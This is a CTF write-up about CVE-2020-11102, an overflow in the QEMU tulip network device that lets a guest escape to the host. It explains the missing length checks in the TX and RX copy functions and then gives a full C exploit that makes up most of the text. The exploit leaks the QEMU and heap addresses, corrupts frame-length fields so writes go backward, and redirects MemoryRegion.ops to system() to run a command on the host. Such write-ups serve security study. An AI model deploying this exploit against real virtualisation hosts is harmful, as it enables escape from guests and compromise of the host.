CVE-2020-11102: Escape from the Earth
Introduction
I participated in the Aliyun CTF competition recently and solved an interesting challenge based on CVE-2020-11102, which is a vulnerability in qemu that allows guest OS to escape and execute arbitrary code on the host OS. In this article, I would like to share some detail about the challenge and what I learned from it.
The vulnerability
static void tulip_copy_tx_buffers(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> TDES1_BUF1_SIZE_SHIFT) & TDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> TDES1_BUF2_SIZE_SHIFT) & TDES1_BUF2_SIZE_MASK;
if (len1) {
pci_dma_read(&s->dev, desc->buf_addr1,
s->tx_frame + s->tx_frame_len, len1);
s->tx_frame_len += len1;
}
if (len2) {
pci_dma_read(&s->dev, desc->buf_addr2,
s->tx_frame + s->tx_frame_len, len2);
s->tx_frame_len += len2;
}
desc->status = (len1 + len2) ? 0 : 0x7fffffff;
}
Take a look at tulip_copy_tx_buffers()
first. It copies the desc->buf_addr1
to the tx_frame + s->tx_frame_len
. Notice that there is no check for the s->tx_frame_len
as well as the len1
. And s->tx_frame_len
will be increased by len1
after copying. When we call this function multiple times, the s->tx_frame_len
can be increased to a very large value, which can cause a buffer overflow.
The same applies to tulip_copy_rx_bytes()
.
static void tulip_copy_rx_bytes(TULIPState *s, struct tulip_descriptor *desc)
{
int len1 = (desc->control >> RDES1_BUF1_SIZE_SHIFT) & RDES1_BUF1_SIZE_MASK;
int len2 = (desc->control >> RDES1_BUF2_SIZE_SHIFT) & RDES1_BUF2_SIZE_MASK;
int len;
if (s->rx_frame_len && len1) {
if (s->rx_frame_len > len1) {
len = len1;
} else {
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr1, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
if (s->rx_frame_len && len2) {
if (s->rx_frame_len > len2) {
len = len2;
} else {
len = s->rx_frame_len;
}
pci_dma_write(&s->dev, desc->buf_addr2, s->rx_frame +
(s->rx_frame_size - s->rx_frame_len), len);
s->rx_frame_len -= len;
}
}
The tulip_copy_rx_bytes()
function copies the s->rx_frame
to the desc->buf_addr1
. And there is no check for the s->rx_frame_len
and s->rx_frame_size
. This results in possible memory disclosure.
Exploitation
Leak something first
To leak QEMU base address and heap address we need to control s->rx_frame_size
and s->rx_frame_len
. Consider the following code:
typedef struct TULIPState {
PCIDevice dev;
MemoryRegion io;
MemoryRegion memory;
NICConf c;
qemu_irq irq;
NICState *nic;
eeprom_t *eeprom;
uint32_t csr[16];
/* state for MII */
uint32_t old_csr9;
uint32_t mii_word;
uint32_t mii_bitcnt;
hwaddr current_rx_desc;
hwaddr current_tx_desc;
uint8_t rx_frame[2048];
uint8_t tx_frame[2048];
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;
uint32_t rx_status;
uint8_t filter[16][6];
} TULIPState;
The tx_frame
is a fixed size buffer, which is 2048 bytes. By triggering tulip_copy_tx_buffers()
multiple times, we can control tx_frame_len
, rx_frame_len
and rx_frame_size
. Then we can call tulip_copy_rx_bytes()
and copy the heap memory back to the user space of the guest OS. With some calculation, we can retrieve the QEMU base address and heap address very easily.
After leaking the memory, we need to figure out how to get arbitrary code exection within the context of QEMU. This piece of code caught my attention:
static const MemoryRegionOps tulip_ops = {
.read = tulip_read,
.write = tulip_write,
.endianness = DEVICE_LITTLE_ENDIAN,
.impl = {
.min_access_size = 4,
.max_access_size = 4,
},
};
What if we can control the function pointer in tulip_ops
? Unfortunately, the tulip_ops
is not writable.
When initializing the memory region of TULIPState
, the pointer to tulip_ops
will be assigned to struct MemoryRegion.ops
.
memory_region_init_io(&s->io, OBJECT(&s->dev), &tulip_ops, s,
"tulip-io", 128);
memory_region_init_io(&s->memory, OBJECT(&s->dev), &tulip_ops, s,
"tulip-mem", 128);
struct MemoryRegion {
Object parent_obj;
/* All fields are private - violators will be prosecuted */
/* The following fields should fit in a cache line */
bool romd_mode;
bool ram;
bool subpage;
bool readonly; /* For RAM regions */
bool nonvolatile;
bool rom_device;
bool flush_coalesced_mmio;
bool global_locking;
uint8_t dirty_log_mask;
bool is_iommu;
RAMBlock *ram_block;
Object *owner;
const MemoryRegionOps *ops;
void *opaque;
MemoryRegion *container;
Int128 size;
hwaddr addr;
void (*destructor)(MemoryRegion *mr);
uint64_t align;
bool terminates;
bool ram_device;
bool enabled;
bool warning_printed; /* For reservations */
uint8_t vga_logging_count;
MemoryRegion *alias;
hwaddr alias_offset;
int32_t priority;
QTAILQ_HEAD(, MemoryRegion) subregions;
QTAILQ_ENTRY(MemoryRegion) subregions_link;
QTAILQ_HEAD(, CoalescedMemoryRange) coalesced;
const char *name;
unsigned ioeventfd_nb;
MemoryRegionIoeventfd *ioeventfds;
};
And struct MemoryRegion
is allocated on the heap. So we can overwrite the struct MemoryRegion.ops
with the address of tx_frame
and craft a fake struct MemoryRegionOps
.
Also, notice that the type of tx_frame_len
, rx_frame_len
and rx_frame_size
are all int
, which means we can write backward if we overwrite these fields with negative value.
Exploitation
The exploitation should be pretty straightforward and the comments in the code should be self-explanatory.
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <stdlib.h>
#include <fcntl.h>
#include <assert.h>
#include <inttypes.h>
#include <sys/io.h>
#define PAGE_SHIFT 12
#define PAGE_SIZE (1 << PAGE_SHIFT) // 4096
#define PFN_PRESENT (1ull << 63)
#define PFN_PFN ((1ull << 55) - 1)
#define PMIO_BASE 0x000000000000c000
#define CSR(_x) ((_x) << 3)
#define CSR5_TS_SUSPENDED 6
#if 0
tulip_write ->
tulip_xmit_list_update ->
tulip_copy_tx_buffers ->
pci_dma_read(&s->dev, desc->buf_addr1, s->tx_frame + s->tx_frame_len, len1); ->
static uint32_t tulip_ts(TULIPState *s)
{
return (s->csr[5] >> CSR5_TS_SHIFT) & CSR5_TS_MASK;
}
#endif
struct tulip_descriptor {
uint32_t status;
uint32_t control;
uint32_t buf_addr1;
uint32_t buf_addr2;
};
int fd;
uint32_t page_offset(uint32_t addr) {
return addr & ((1 << PAGE_SHIFT) - 1);
}
uint64_t gva_to_gfn(void *addr) {
uint64_t pme, gfn;
size_t offset;
offset = ((uintptr_t)addr >> 9) & ~7;
lseek(fd, offset, SEEK_SET);
read(fd, &pme, 8);
if (!(pme & PFN_PRESENT))
return -1;
gfn = pme & PFN_PFN;
return gfn;
}
uint64_t gva_to_gpa(void *addr) {
uint64_t gfn = gva_to_gfn(addr);
assert(gfn != -1);
return (gfn << PAGE_SHIFT) | page_offset((uint64_t)addr);
}
uint64_t pmio_read(uint64_t port) {
uint64_t val;
val = inw(PMIO_BASE + port);
return val;
}
void pmio_write(uint64_t port, uint64_t val) {
outw(val, PMIO_BASE + port);
}
void pmio_writel(uint64_t port, uint64_t val) {
outl(val, PMIO_BASE + port);
}
int main(int argc, char **argv) {
printf("[*] enter stage1\n");
int ret = 0;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}
iopl(3);
// allocate descriptor
struct tulip_descriptor *tx_desc = malloc(sizeof(struct tulip_descriptor));
struct tulip_descriptor *rx_desc = malloc(sizeof(struct tulip_descriptor));
char *recv_buf = malloc(0x9000);
char *buf = malloc(0x1000);
memset(buf, 'A', 0x1000);
memset(recv_buf, 'B', 0x9000);
int len1 = 0x400 << 0;
int len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24); // TDES1_FS, clean tx_frame_len
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
// get the physical address of the descriptor
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
// set CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len should be 0x400 now
printf("[*] fill tx_frame\n");
// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa); // tx_frame_len shoule be 0x800 now
// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
struct oob_data { // control the following fields in TULIPState
int tx_frame_len;
int rx_frame_len;
int rx_frame_size;
uint32_t rx_status;
uint8_t filter[16][6];
};
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = 0x400 - len1;
oob_data->rx_frame_len = 0x900;
oob_data->rx_frame_size = 2048*2 + 0x900;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 'A';
oob_data->filter[i][1] = 'A';
oob_data->filter[i][2] = 'A';
oob_data->filter[i][3] = 'A';
oob_data->filter[i][4] = 'A';
oob_data->filter[i][5] = 'A';
}
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24) | (1UL << 30);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // CSR6_OM_SHIFT trigger tulip_receive
sleep(1);
printf("[*] OOB write tx_frame_len...\n");
int rx_len1, rx_len2;
rx_len1 = 0x400;
rx_len2 = 0;
rx_desc->status = (1UL << 31) | (1UL << 24); // RDES0_OWN
rx_desc->buf_addr1 = gva_to_gpa(recv_buf);
rx_desc->buf_addr2 = 0x180;
rx_desc->control = rx_len2 | rx_len1 | (1UL << 24) | (1UL << 30);
// set rx descriptor
sleep(1);
uint64_t rx_desc_gpa = gva_to_gpa(rx_desc);
printf("[*] rx_desc_gpa: 0x%lx\n", rx_desc_gpa);
pmio_writel(CSR(3), rx_desc_gpa);
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
printf("[+] leak\n");
char *cur = (char *)recv_buf;
for (int i = 0; i < 50; ++i) {
printf("0x%016lx 0x%016lx\n", *(size_t *)cur, *(size_t *)(cur+8));
cur += 16;
}
cur = (char *)recv_buf;
uint64_t qemu_base = ((uint64_t *)cur)[0x1d] - 0x755f9f;
uint64_t heap_base = ((uint64_t *)cur)[22] - 0xe11380;
uint64_t qemu_plt_system = qemu_base+2859620;
uint64_t frame_base = heap_base+0xe0fcf0;
printf("[*] continue...\n");
printf("[+] qemu_base: 0x%lx\n", qemu_base);
printf("[+] heap_base: 0x%lx\n", heap_base);
printf("[*] enter stage2\n"); {
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
printf("[*] fill tx_frame\n");
// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);
// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x3350 - 0x70;
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_write(CSR(6), 0x800 | (1u << 13) | (1UL << 1)); // trigger tulip_tx
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
sleep(1);
uint64_t *binsh = (uint64_t *)malloc(0x200);
binsh[0] = 7449354444534473059; // catflag
binsh[1] = 0;
len1 = 16;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(binsh);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
}
// now control MemoryRegion.ops
printf("[*] enter stage3\n"); {
((uint64_t *)buf)[0] = qemu_plt_system;
((uint64_t *)buf)[1] = qemu_plt_system;
((uint64_t *)buf)[2] = 0;
((uint64_t *)buf)[3] = 0;
((uint64_t *)buf)[4] = 2;
((uint64_t *)buf)[5] = 0;
((uint64_t *)buf)[6] = 0;
((uint64_t *)buf)[7] = 0;
((uint64_t *)buf)[8] = 0x0000000400000004;
((uint64_t *)buf)[9] = 0;
((uint64_t *)buf)[10] = 0;
((uint64_t *)buf)[11] = 0;
len1 = 0x400 << 0;
len2 = 0 << 11;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 29) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
printf("[*] desc: 0x%x\n", tx_desc->buf_addr1);
uint64_t tx_desc_gpa = gva_to_gpa(tx_desc);
printf("[*] tx_desc_gpa: 0x%lx\n", tx_desc_gpa);
// CSR5_TS_SUSPENDED
pmio_writel(CSR(6), 1u << 13); // CSR6_ST
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
printf("[*] fill tx_frame\n");
// set tx descriptor
sleep(1);
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->control = len2 | len1 | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(buf);
tx_desc->buf_addr2 = 0x180;
pmio_writel(CSR(4), tx_desc_gpa);
// tulip_tx: tulip_receive(s, s->tx_frame, s->tx_frame_len);
printf("[*] clean CSR5\n");
pmio_writel(CSR(5), 0xffffffff);
len1 = sizeof(struct oob_data);
struct oob_data *oob_data = malloc(sizeof(struct oob_data));
oob_data->tx_frame_len = -0x2a28-0x70; // now points to the MemoryRegion.ops
oob_data->rx_frame_len = 0;
oob_data->rx_frame_size = 0;
for (int i = 0; i < 16; i++) { // bypass some stuff
oob_data->filter[i][0] = 0xff;
oob_data->filter[i][1] = 0xff;
oob_data->filter[i][2] = 0xff;
oob_data->filter[i][3] = 0xff;
oob_data->filter[i][4] = 0xff;
oob_data->filter[i][5] = 0xff;
}
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(oob_data);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
// set tx descriptor
sleep(1);
pmio_writel(CSR(4), tx_desc_gpa);
sleep(1);
printf("[*] hijack ops\n");
uint64_t *fake_memory_region_ops = (uint64_t *)malloc(0x200);
fake_memory_region_ops[0] = frame_base;
len1 = 8;
len2 = 0;
tx_desc->status = (1UL << 31) | (1UL << 24);
tx_desc->buf_addr1 = gva_to_gpa(fake_memory_region_ops);
tx_desc->buf_addr2 = 0x180;
tx_desc->control = len2 | len1 | (1UL << 24);
pmio_writel(CSR(4), tx_desc_gpa);
// trigger the ops.write
pmio_writel(CSR(4), tx_desc_gpa);
}
return 0;
}